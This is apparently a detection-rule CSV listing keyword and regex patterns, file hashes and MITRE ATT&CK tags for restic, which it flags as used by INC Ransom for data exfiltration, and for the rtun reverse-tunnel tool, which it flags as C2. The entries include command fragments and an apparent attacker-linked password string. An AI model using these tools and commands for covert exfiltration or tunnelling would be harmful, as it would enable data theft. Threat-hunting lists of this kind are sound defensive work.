"*fbaf3740b294ecd0cebcae3e5c7005b6fc9897357b8ee050a30c01cccd3b2019*",".{0,1000}fbaf3740b294ecd0cebcae3e5c7005b6fc9897357b8ee050a30c01cccd3b2019.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*fbb5435d1881e4a8df856378bbfa5b83bcb21ec9163a0690c63b88a83274729a*",".{0,1000}fbb5435d1881e4a8df856378bbfa5b83bcb21ec9163a0690c63b88a83274729a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*fca1c44409a39abbd36c9326a96a8470022e5e48d436b6c57fa4b2735d69405c*",".{0,1000}fca1c44409a39abbd36c9326a96a8470022e5e48d436b6c57fa4b2735d69405c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*fca3229e1f47db94e4707350c7b8fff9cb0e27d61d130477ad0ea3dd3808da67*",".{0,1000}fca3229e1f47db94e4707350c7b8fff9cb0e27d61d130477ad0ea3dd3808da67.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*fcb302a952c8b928788cabbefc0e8393eed884ec306f9d0ea9b3c109b8f31f40*",".{0,1000}fcb302a952c8b928788cabbefc0e8393eed884ec306f9d0ea9b3c109b8f31f40.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*fcb8cfece92e787dc07616f7942b8632e74c24bafe6de1d0245543b9c7010a76*",".{0,1000}fcb8cfece92e787dc07616f7942b8632e74c24bafe6de1d0245543b9c7010a76.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*fce382fdcdac0158a35daa640766d5e8a6e7b342ae2b0b84f2aacdff13990c52*",".{0,1000}fce382fdcdac0158a35daa640766d5e8a6e7b342ae2b0b84f2aacdff13990c52.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*fd0df9fb27d39a7990ecb66d872798148d6954207d653510035e087e1b6218a9*",".{0,1000}fd0df9fb27d39a7990ecb66d872798148d6954207d653510035e087e1b6218a9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*fd36ecab09eb04dab2aadae09347fcb19ba8d020d1684d4a096402e0aed15655*",".{0,1000}fd36ecab09eb04dab2aadae09347fcb19ba8d020d1684d4a096402e0aed15655.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*fd900c4347ee081a5dcd7bd1d33cb748621f72793fdc63becb9b0410a14df494*",".{0,1000}fd900c4347ee081a5dcd7bd1d33cb748621f72793fdc63becb9b0410a14df494.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*fda4d4aa167c0baa4ef5159613f090dcc61b265108cc93c98c9bfdcbd6a486a0*",".{0,1000}fda4d4aa167c0baa4ef5159613f090dcc61b265108cc93c98c9bfdcbd6a486a0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*fdee8d4b32f8da73f39a0ee525a90343b663edc671c520d97e1540b41531be32*",".{0,1000}fdee8d4b32f8da73f39a0ee525a90343b663edc671c520d97e1540b41531be32.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*fe0c598004e2f3453bcd75e0d3ea77372289cf17302f162089b3c544a54d2216*",".{0,1000}fe0c598004e2f3453bcd75e0d3ea77372289cf17302f162089b3c544a54d2216.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*fe3115fada63d6efd85cb0e3f7a9c52e688004334eef6c0d7349c39b64e9470d*",".{0,1000}fe3115fada63d6efd85cb0e3f7a9c52e688004334eef6c0d7349c39b64e9470d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*fec7ade9f12c30bd6323568dbb0f81a3f98a3c86acc8161590235c0f18194022*",".{0,1000}fec7ade9f12c30bd6323568dbb0f81a3f98a3c86acc8161590235c0f18194022.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*ff1a32145246a5c3e38142aa015cfbcd5dc046674d0a3f16979ff6c4eb1cfe6a*",".{0,1000}ff1a32145246a5c3e38142aa015cfbcd5dc046674d0a3f16979ff6c4eb1cfe6a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*ff955edce7641fd51844726398cedcd9a27d45f74731ca3c79a0abab5bf5ebc1*",".{0,1000}ff955edce7641fd51844726398cedcd9a27d45f74731ca3c79a0abab5bf5ebc1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*ffba5315499b161375d0a2e0f54789e93d32383be19ec2b7b1a8fe050dd9af6e*",".{0,1000}ffba5315499b161375d0a2e0f54789e93d32383be19ec2b7b1a8fe050dd9af6e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*http://*:9000/restic*",".{0,1000}http\:\/\/.{0,1000}\:9000\/restic.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","1","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*https://*:9000/restic*",".{0,1000}https\:\/\/.{0,1000}\:9000\/restic.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","1","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*restic backup --*",".{0,1000}restic\sbackup\s\-\-.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*restic check --read-data*",".{0,1000}restic\scheck\s\-\-read\-data.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*restic init --repo *",".{0,1000}restic\sinit\s\-\-repo\s.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*restic -o s3.bucket-lookup*",".{0,1000}restic\s\-o\ss3\.bucket\-lookup.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*restic -r *",".{0,1000}restic\s\-r\s.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*restic --repo *",".{0,1000}restic\s\-\-repo\s.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*restic/restic:latest*",".{0,1000}restic\/restic\:latest.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","1","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*restic_*_windows_amd64.exe*",".{0,1000}restic_.{0,1000}_windows_amd64\.exe.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","1","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*RESTIC_PASSWORD=""I9n7G7G0ZpDWA3GOcJbIuwQCGvGUBkU5*",".{0,1000}RESTIC_PASSWORD\=\""I9n7G7G0ZpDWA3GOcJbIuwQCGvGUBkU5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*RESTIC_REST_PASSWORD*",".{0,1000}RESTIC_REST_PASSWORD.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*RESTIC_REST_USERNAME*",".{0,1000}RESTIC_REST_USERNAME.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*winpty restic *",".{0,1000}winpty\srestic\s.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"* rtun-server-windows-amd64.exe*",".{0,1000}\srtun\-server\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"* rtun-windows-amd64.exe*",".{0,1000}\srtun\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"* Starting tunneling server*",".{0,1000}\sStarting\stunneling\sserver.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*/reverse-tunnel.git*",".{0,1000}\/reverse\-tunnel\.git.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*/reverse-tunnel/agent/cmd*",".{0,1000}\/reverse\-tunnel\/agent\/cmd.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*/reverse-tunnel/server/service*",".{0,1000}\/reverse\-tunnel\/server\/service.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*/rtun-freebsd-amd64*",".{0,1000}\/rtun\-freebsd\-amd64.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*/rtun-linux-amd64*",".{0,1000}\/rtun\-linux\-amd64.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*/rtun-linux-arm64*",".{0,1000}\/rtun\-linux\-arm64.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*/rtun-mac-amd64*",".{0,1000}\/rtun\-mac\-amd64.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*/rtun-server-freebsd-amd64*",".{0,1000}\/rtun\-server\-freebsd\-amd64.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*/rtun-server-linux-amd64*",".{0,1000}\/rtun\-server\-linux\-amd64.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*/rtun-server-linux-arm64*",".{0,1000}\/rtun\-server\-linux\-arm64.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*/rtun-server-mac-amd64*",".{0,1000}\/rtun\-server\-mac\-amd64.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*/rtun-server-windows-amd64.exe*",".{0,1000}\/rtun\-server\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*/rtun-windows-amd64.exe*",".{0,1000}\/rtun\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*\rtun-server-windows-amd64.exe*",".{0,1000}\\rtun\-server\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*\rtun-windows-amd64.exe*",".{0,1000}\\rtun\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*0f5c329fa1e4abd3d1d2fbbd493d0dcf419bc33e1aa809ed55500481ed2ebe65*",".{0,1000}0f5c329fa1e4abd3d1d2fbbd493d0dcf419bc33e1aa809ed55500481ed2ebe65.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*14d29e0f977fb74a925c9c2cab1ef3ed34eb6b35345b0af1645a64f6b85040f8*",".{0,1000}14d29e0f977fb74a925c9c2cab1ef3ed34eb6b35345b0af1645a64f6b85040f8.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*19529823b5d0e8b0c2a4cf5e67b825254efbd7568b7d6b204a220e684e3787d7*",".{0,1000}19529823b5d0e8b0c2a4cf5e67b825254efbd7568b7d6b204a220e684e3787d7.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*1ccedb3262e89f8d841a6c6b3ea5e8c5ef8fb42779168e5cc47ba1674be930f1*",".{0,1000}1ccedb3262e89f8d841a6c6b3ea5e8c5ef8fb42779168e5cc47ba1674be930f1.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*2e28d91e35ca1009d77fc67d36553730e785333ffc14cb8af621113571bd730b*",".{0,1000}2e28d91e35ca1009d77fc67d36553730e785333ffc14cb8af621113571bd730b.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*2e4ce6b3a2e7019459a3f6cad24e07ee614c800a9d5b29c3d83f50fd758d1a93*",".{0,1000}2e4ce6b3a2e7019459a3f6cad24e07ee614c800a9d5b29c3d83f50fd758d1a93.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*397ac6bd1ffe2d8baf3c8e41307bb36339fa0f7a97e61b614d25ab85cb3b90a7*",".{0,1000}397ac6bd1ffe2d8baf3c8e41307bb36339fa0f7a97e61b614d25ab85cb3b90a7.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*3b76d79a32202f1cdbae1e5ed949ee7a75f373a9280fbdfd15a6cc4490a1b595*",".{0,1000}3b76d79a32202f1cdbae1e5ed949ee7a75f373a9280fbdfd15a6cc4490a1b595.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*3e62062061ddd7a0974eb2f6106dc96d3c54f95f41121ff355de12d5a23e2624*",".{0,1000}3e62062061ddd7a0974eb2f6106dc96d3c54f95f41121ff355de12d5a23e2624.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*411b16657e992717f0eb9ac77b2a5468e23afcc8747bdabba4bcdfc008c845e7*",".{0,1000}411b16657e992717f0eb9ac77b2a5468e23afcc8747bdabba4bcdfc008c845e7.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*512fba960ac745dbb62576225ee9dd7f65bf83261c8d1364f50101c8e3fd55bf*",".{0,1000}512fba960ac745dbb62576225ee9dd7f65bf83261c8d1364f50101c8e3fd55bf.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*5e47aac7b50d8ac6ce9ebba6c28ca58ef1332493fba47ab47ec1d2da61c7f6e2*",".{0,1000}5e47aac7b50d8ac6ce9ebba6c28ca58ef1332493fba47ab47ec1d2da61c7f6e2.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*6ab324b655ea1c39c3c8fb5709f322f0c468a203411fbbcb460b36ee0fc1d835*",".{0,1000}6ab324b655ea1c39c3c8fb5709f322f0c468a203411fbbcb460b36ee0fc1d835.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
